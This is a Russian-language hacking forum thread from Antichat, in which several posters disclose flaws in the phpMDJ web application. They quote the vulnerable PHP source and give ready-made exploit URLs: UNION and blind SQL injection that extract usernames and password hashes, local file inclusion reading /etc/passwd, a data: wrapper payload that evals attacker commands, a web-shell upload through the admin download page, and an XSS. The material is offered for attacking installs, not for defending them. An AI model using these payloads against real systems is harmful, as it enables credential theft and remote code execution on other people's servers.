ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
08.11.2009, 12:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
phpMDJ
SQL-inj
Файл profil.php
PHP код:
$membre = $_GET['id'];
$sql = "SELECT a.nom AS nGroupe, u.* FROM phpmdj_users u, phpmdj_auth a WHERE u.groupe = a.id_groupe AND u.id = $membre";
Код:
http://localhost/phpMDJ/profil.php?id=-1+union+select+1,2,concat_ws(0x3a,pseudo,mdp),4,5,6,7,8,9,10,11,12,13,14,15,16+from+phpmdj_users--
Файл calendrire.php
PHP код:
$event = $_GET['id'];
....
elseif($mode == "anime")
{$sql = "SELECT * FROM phpmdj_animes WHERE id_anime = $event";
http://localhost/phpMDJ/calendrier.php?mode=anime&id=1+union+select+1,2,un hex(hex(version())),4,5,6,7--
Залитие шелла
Файл admin_download.php
PHP код:
$rep = "../documents/";
$savefile = $rep.$_FILES["userfile"]["name"];
$temp = $_FILES["userfile"]["tmp_name"];
$fichier = $_FILES["userfile"]["name"];
$titre = prepareText($_POST["titre"]);
$date = mktime();
$groupe= $_POST['groupe'];
if(move_uploaded_file($temp, $savefile))
http://localhost/phpMDJ/admin/admin_download.php?mode=ajout
Льем шелл и как видим он попадает в папку documents =>
http://localhost/phpMDJ/documents/shell.php
SQL в админке (не так важно, но все же поиск багов)
Файл admin_news
PHP код:
$news = $_GET['id_news'];
...
elseif($mode == "edit")
{
$sql = "SELECT * FROM phpmdj_news WHERE id_news = $news";
http://localhost/phpMDJ/admin/admin_news.php?mode=edit&id_news=-2+union+select+1,2,version(),4,5,6--
aXSS
Отправляем письмо c заголовком <script>alert()</script>
Последний раз редактировалось HAXTA4OK; 08.11.2009 в 14:41..
|
|
|
23.04.2010, 15:46
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
слив роа
|
|
|
|
02.07.2010, 17:46
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
phpMDJ v0.5(latest)
Download: http://sourceforge.net/projects/phpdj/
LFI(mq==off):
Уязвимый файл:
./dj/djpage.php
Код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phprank"[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"Suspended"[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]"Your account is suspended. You may NOT access this page."[/COLOR][COLOR="#007700"];
include[/COLOR][COLOR="#DD0000"]"blank.html"[/COLOR][COLOR="#007700"];
exit();
} else if([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"main"[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]"Welcome to Radio Panel™, "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phpname"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".
You are currently a(n) "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phprank"[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#FF8000"]//проверяет содержимое page и делает что-то как в коде выше
[/COLOR][COLOR="#007700"]...
} else if ([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"html"[/COLOR][COLOR="#007700"]) {
include[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#DD0000"].html"[/COLOR][COLOR="#007700"];
} else {
include[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
Эксплуатация:
./dj/djpage.php?page=../../../../../../../../etc/passwd%00
|
|
|
|
05.07.2010, 03:27
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Вообще-то, там выполнение кода, без mq=off можно
Сообщение от None
dj/djpage.php?page=data:,%3C?php%20eval($_REQUEST[cmd]);%20?%3E&cmd=phpinfo();
(Ну если mq =on то base64 )
Ща пишу сплойт, точнее писал. Закончу выложу.
Blind Sql injection.
Уязвимый файл:
usercomplaint.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$djname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'djname'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'offusername'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$userip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'offip'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$complaint[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'comments'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$djip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'F jS Y, h:iA'[/COLOR][COLOR="#007700"]);
include ([/COLOR][COLOR="#DD0000"]"sql.php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `abuse` ( `djname` , `djip` , `date` , `user` , `userip` , `complaint` ) VALUES ( '[/COLOR][COLOR="#0000BB"]$djname[/COLOR][COLOR="#DD0000"]' , '[/COLOR][COLOR="#0000BB"]$djip[/COLOR][COLOR="#DD0000"]' , '[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#DD0000"]' , '[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#DD0000"]' , '[/COLOR][COLOR="#0000BB"]$userip[/COLOR][COLOR="#DD0000"]' , '[/COLOR][COLOR="#0000BB"]$complaint[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"])
or die ([/COLOR][COLOR="#DD0000"]"Could not insert into database."[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
echo[/COLOR][COLOR="#DD0000"]"Report succesfully sent."[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
How to:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]',(SELECT name FROM members where rank=char(97,100,109,105,110) AND ascii(lower(substring((SELECT pass from members),1,1)))>=100),null,null,null,null)--[/COLOR][/COLOR]
Post'ом естественно.
Sql injection:
Need mq = off
Сообщение от None
/dj/showprofiles_info.php?name=-1'+union+select+1,2,3,4,5,6,7,8,9+--+
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// Стасок плакал
[/COLOR][COLOR="#0000BB"]$sql_pass_get[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM profile WHERE name='[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Blind SQL injection
dj/showalert.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'message'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$checkip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'checkip'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$djname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'djname'[/COLOR][COLOR="#007700"]];
include[/COLOR][COLOR="#DD0000"]"sql.php"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"TRUNCATE TABLE `ipalert`"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `ipalert` ( `IP` , `message` , `djname` ) VALUES ( '[/COLOR][COLOR="#0000BB"]$checkip[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#DD0000"]' , '[/COLOR][COLOR="#0000BB"]$djname[/COLOR][COLOR="#DD0000"]' );"[/COLOR][COLOR="#007700"])
or die ([/COLOR][COLOR="#DD0000"]"Could not insert into database."[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]"Alert issued."[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Аналогично верхнему, токо чуть чуть подругому.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
